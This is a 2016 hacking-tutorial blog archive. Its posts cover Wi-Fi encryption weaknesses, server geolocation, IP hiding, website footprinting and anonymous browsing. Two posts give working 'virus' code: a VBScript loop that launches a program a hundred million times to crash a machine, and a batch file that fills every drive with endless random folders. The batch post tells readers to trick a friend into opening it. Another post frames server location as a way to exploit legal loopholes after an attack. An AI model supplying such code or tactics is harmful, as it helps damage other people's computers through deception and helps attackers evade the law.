Showing posts with label computer hacker. Show all posts
Showing posts with label computer hacker. Show all posts

Thursday, 9 June 2016

Wireless Hacking

Wireless Hacking

Hello Friends, Today we are going to study "Wireless Hacking". Wireless networks are all around , from home to corporate server farms. They make our lives by avoiding physical connectivity to networks via cables while providing guaranteed consistent network connectivity of devices. It is an advantage with a certain danger attached to it . Wireless network are prone to hacking attacks. We will examine a couple of strategies to secure wireless networks to accomplish satisfactory security.


How do Wireless Network Work ?

Before we discuss wireless network security and weakness, we must understand the fundamental radio transmission and the IEEE 820.11 protocol, regularly known as the WLAN protocol. This protocol connects two or more devices within the short range, Using radio signals. to set up a wireless network, you require a wireless access point and a wireless network card for every device to be connected. The access point is also referred as a Hotspot. It consists of a radio transmitter which is used for transmitting and receiving signals, additionally it also contains hardware which converts data signals to radio signals & vice versa.

we can access a wireless network using wireless network enabled device such as a laptop, tablet, smartphones etc. within the transmission range of a wireless point. most of the device have the wireless network option enabled by default.

you can connect to any wireless network if it is not password protected. if it is password protected then you will need the password to gain access.

Wireless network Authentication 

As the wireless network network is open to every body who has a wireless network enabled gadget, most network are now configured with some kind of encryption and authentication mechanisms.

Let's take a look at some of the commonly used wireless authentication techniques.

WEP

WEP is the acronym for wired equivalent privacy. It was developed for IEEE 802.11 WLAN standards. Its objective was to provide data protection similar or equivalent to that provided by wired networks. WEP encrypts the data, When transmitted over the networks to keep it safe.

WEP Weakness

WEP has significant design flaws and vulnerabilities 

  • WEP is based on passwords which makes it vulnerable to dictionary based attacks.
  • WEP uses R encryption algorithm to create stream ciphers. The stream Cipher input is made of an initial value (iv) and a secret key. The length of the initial value (iv) is 24 bits long while the secret key can either be 40 bits or 140 bits long. The total length of both the initial value and secret can either be 64 bits or 128 bits long. The lower possible value of the secret key makes it easy to crack it.
  • Weak initial values combination don't encrypt adequately.
  • Initial values can be reused.

WPA

WPA stands for WI-FI Procted access. It is A security Protocol developed through The WI-FI alliance in response to the weakness found in WEP. It is used to encrypt data on 802.11 WLAN's. It uses higher initial values 48 bits as an alternative to the 24 bits that WEP uses. It uses temporary Keys to encrypt packets.

WPA Weakness

  • The collision avoidance implementation can be broken.
  • It is vulnerable to DoS attacks.
  • Pre-shared keys Use passphrases. Weak passphrases are vulnerable to dictinary based attacks.
If you like my post & my Blog Please Comment and review it 
______________Thank You________________

Finding The location Of a Server

Finding The location Of a Server

Hello Friends, Today i am going to Show to How to Find the location of a Server. This is very Important step in hacking a Server. In a Case you got caught by Cyber Police you can get rid out of the case from the loopholes in Cyber Laws of that country. It will Only happen when you know the Cyber law of that Country this is only possible when you know the location of the server.


  

Pre-requisite

  • A Computer installed with OS
  • Internet Connection 

What is a Web server ?

web server is a computer system that processes requests via HTTP, the basic network protocol used to distribute information on the World Wide Web. The term can refer to the entire system, or specifically to the software that accepts and supervises the HTTP requests.

The primary function of a web server is to store, process and deliver web pages to clients. The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). Pages delivered are most frequently HTML documents, which may include imagesstyle sheets and scripts in addition to text content.

Steps to Find The Location Of a Server

1- Open Your Web Browser.

2- Search For "www.iplocation.org".

3- "iplocation.org" Looks like This


4- Give the Target Domain or IP Address.


5- Click on IP lookup.

6- It will show you Result Like This.

You can See that It shows the IP Address Of the Target & Country, Region, City .

[Note]
This Tutorial Is Only for Educational Purpose.

If you like my Blog, My Post's Please leave a Comment 
____________________________________Thank You ____________________________________

Tuesday, 31 May 2016

How to Hide IP Address in Android

How to Hide IP Address in Android 

Hello Friends, Today I am Going to show you How to Hide IP Address in Android . We should Hide Our IP address for some Security reasons like :-


  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.
This Tutorials Is only for Educational Purpose. I will not Responsible any Damage done to your Android Handset

Introduction


Internet has Become so common these days that most of the people take it for granted. While everyone spends hours on internet, only a few online seems to care about their security When they are Online. Cyber Security has become one of the burning issues in this decade and your security is always in your hand. The small measure we take towards secure browsing will have a huge impact. using strong password, Hiding your IP address are some of the security measure you can follow, while the first one is self explanatory in this article I will show you how you can hide your IP address in your PC and Smartphone 



What Is IP address ?

An Internet Protocol address (IP address) is a numerical label assigned to each device (Computer, Printer) participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."

Why you should Hide IP Address ?

You may have your own reasons for hiding your IP Address, but here are a few technical reasons why people hide their public IP Address.

Hiding your IP Address is a good step in Protecting Yourself Online. I don't Want you to think it's Useless, But it's Certainly not the definitive measure that keeps your Online status Anonymous or Protected. 

We should Hide Our IP address for some Security reasons like :-
  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.

The only true way to remain anonymous online is to not even connect to the internet. :)

How to Hide IP Address In Android ?

The most Comman way to hide IP and Safe guard your Online identity in an android device is to download and install any VPN app from the Google Play Store. Some of the best VPN application that you can use are given below.
  • Hostspot shield Free VPN Proxy.
  • TunnelBear VPN 
  • Hideman VPN 
  • Tigervpns Free VPN and Proxy.
  • Free & Premium VPN - Finch VPN
  • Betternet Unlimited Free VPN

Tuesday, 3 May 2016

How to Find Information of a Website

How to Find Information of a Website

Hello Friends, I am Mahak Bhawsar a Ethical Hacker. I am Back with some New Hacking Tutorials. In this post we are Going to Study How we can Find Information of Website. As u all knows that Foot printing is first step for a Hacker. Foot Printing mean gathering information of our target.



In this Tutorial we Gonna Find Information of Website like :-
  • Its Domain  
  • Its Name server 
  • IP of Server
  • IP of Name Server
  • Its Hosting Company
  • Its Domain Registrar
  • Which Web server they are using 
  • OS of Web server

Pre-requisite

Steps

1. Select the target Website & copy the Domain of the website. Ex www.microsoft.com 
2. Go the www.netcraft.com & paste the domain.


3. After Pasting Domain Click arrow & wait for Result. 
4. You will get Result like this




5. You will get some Information Through this Website & for some more Information we will use a tool called DNS Data View.
6. Download the tool from Internet and Install it.
7. Run the application as Administration.


8. When you start application you will see this Window.


9. Give the target Domain Ex zoomgroup.com & click OK.


10. Wait for some time you will get Result like this.

_________________Thank You_________________


Friday, 29 April 2016

How To Surf Anonymously & Access Blocked Content

How To Surf Anonymously & Access Blocked Content

Hello Friends, Today I gonna Show you How to Surf Anonymously on Internet & Also How to Access Blocked or Censored Content on Internet. We are Going to use Tools to Surf anonymously on Internet.


How To Surf Anonymously

What is surfing Anonymously on Browser ?

Surfing Anonymously on Browser means Surfing on Internet without Showing user's identifiable Information like IP etc. This can be done with the help of Proxy server, Virtual Private Networks & other Anonymity Program such as "Tor".
Surf Anonymously


Pre-requisite


  • Computer Installed with OS
  • Internet Connection (BroadBand, Dial-up)
  • Cyberghost (Tool)

 What is Cyberghost ?

Cyberghost is a fast, simple & efficient way to protect our Online Privacy, Surf Anonymously and Access Blocked or Censored Content. It offers top-notch Security and Anonymity Without Being Complicated to use or Slowing down your Internet Connection.

Cyberghost is an application which allow you to encrypt your Internet Connection.

You Can Download The Cyberghost Tools link is given below.
-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------

Steps to Use Cyberghost


1. Go to the Link Given and Download the Cyberghost tool.

2.  After Download, Install the Cyberghost & Download the Required Component.

3. After Installation Go on www.whatismyipaddress.com & See your IP address.


Now you can See that my IP is "49.206.206.89" & I belong Hyderabad, India.

4. Start the Cyberghost Application You will see this window.


5. Now Click on Power button to Start the Tool.

6. After Starting the Tool you will Get this Window.


7. Now you can See that I got new IP address which is 199.115.115.209 & This IP belong to Pristina Serbia U.S.A.

8. Now Go Again to www.whatismyipaddess.com to see What is your IP address.


I got new IP address which is 199.115.115.209 & This IP belong to Pristina Serbia U.S.A.

How to Access Blocked Content & Censored Content




At Some Places Some website are blocked to Access. The restrictions that are actually dependent on your location. This is all Because of your server Geo location. For Eg If you are in China you can't Access the Facebook Because in China Facebook is blocked. The server from which you are Requesting to open Facebook is Located in China So you can't Access the Facebook If you want to Access it First you have to change your Server Use Cyberghost application to Get Connected to new Server Which is Located in Another Country & Than request the Server to open the Facebook you can Access the Facebook 

___________________________________Thank You___________________________________

Thursday, 28 April 2016

Virus That Crashes the Computer

Virus That Crashes the Computer

Hello, Friends Today we are Going to make a "Virus that Crashes the Computer"


So Friends, Today we creating a Virus That Crashes the Computer. So please don't try to run this Virus On your own Computer. This Virus is very dangerous for Computer. This can Harm your Computer very badly. I will not be Responsible for any Damage done to your Computer. Do all the Practical on your Own risk.


In this Post, We are going to develop a "Virus" which Crashes the Computer. To Develop this Virus i am going to use Visual Basic Script. 

After opening the Virus Computer get Crash. There is no other way to protect your Computer.

[Note] This Post is only for Educational Purpose.

Steps to Create Virus


1. Go to Start Menu.
2. Open Notepad.
3. Just copy & Paste the Code Given Below.
_______________CODE_______________

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)
Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next
____________________________________
4. Save this file with ".vbs" Extension.
5. Your Virus is Completed. It is ready to Run.

_________________________Thank You_________________________

Wednesday, 27 April 2016

Virus That Create Multiple Folders in All Drives

Virus That Create Multiple Folders in All Drives

Today,We are Going to create a "Virus That create Multiple Folder in all Drives."




Prerequisite

1. A Computer.
2. Notepad.

Steps to Create Virus


1. Go to Start Menu.
2. Open Notepad.
3. Copy the Following Code Given Below.

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS

__________________________________

5. Give this File to your Friend & tell him to Open The File. It will create Random Folder in all Drive.

Sunday, 17 April 2016

How to Become Hacker

How to Become Hacker

Today, I am Going to give you Knowledge about Who is Hacker and Skill's of Hacker

Who is a Hacker..???

The Hacker is the one who has good knowledge of computer. A Hacker is one who is able to gain the Unauthorized access to your Computer or your Privacy.

Types of hacker :-

1. Black Hat Hacker.
2. White Hat Hacker.
3. Grey Hat Hacker.


Skill's of Hacker :-

Hacker has good knowledge of all this module.

1. Networking.
2. Operating system.
3. Router.
4. Switch.
5. Applications 
6. Programming.
7. Scripting.
8. Database.